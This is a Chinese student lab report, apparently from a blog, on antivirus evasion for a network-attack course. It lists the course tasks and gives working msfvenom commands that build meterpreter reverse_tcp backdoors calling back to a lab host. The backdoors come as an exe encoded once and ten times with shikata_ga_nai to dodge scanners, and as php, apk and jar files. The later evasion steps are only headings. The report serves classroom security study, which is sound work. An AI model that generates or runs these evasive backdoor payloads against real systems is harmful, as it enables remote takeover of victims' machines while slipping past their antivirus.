20181328 《网络对抗技术》Exp3 免杀原理与实践

一、实验内容：

• 1.正确使用msf编码器，msfvenom生成如jar之类的其他文件
  • msfvenom生成php文件
  • msfvenom生成apk文件
  • msfvenom生成jar文件
  • veil
  • 使用C + shellcode编程
  • 加壳工具（压缩壳、加密壳）
• 2.通过组合应用各种技术实现恶意代码免杀
  • 免杀实践1
  • 免杀实践2
  • 免杀实践3（强一些）
• 3.用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本
  • 对免杀实践1做出的exe进行测试
  • 对免杀实践3做出的exe进行测试

二、实验要求：

• 1.报告格式范围，版面整洁 加0.5
• 2.报告排版混乱，加0分。
• 3.报告逻辑混乱表述不清或文字有明显抄袭可能 -1

 

三、实验步骤：

 

一、正确使用msf编码器

1.使用msfvenom -l encoders查看可以使用的编码器来生成不同的后门

 msfvenom -l encoders 

 

2.对实验二生成的20181328_backdoor.exe后门程序用VirusTotal进行扫描，结果如下图所示：

 

 

 

一次编码：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.19.136 LPORT=1328 -f exe > csq-encoded.exe 

 

十次编码：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.19.136 LPORT=1328 -f exe > csq-encoded10.exe

 

3.msfvenom生成php文件

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.19.136 lport=1328 x> zwq_backdoor.php

 

 4.msfvenom生成apk文件

 

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.19.136 lport=1328 x> zwq_backdoor.apk

 

 

 

 

 

 

5.msfvenom生成jar文件

 

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.136 LPORT=1328 x> zwq_backdoor_java.jar

 

 

 

 

标签：exe,免杀,Exp3,1328,tcp,生成,192.168,20181328,msfvenom
来源： https://www.cnblogs.com/1005zwq/p/14615960.html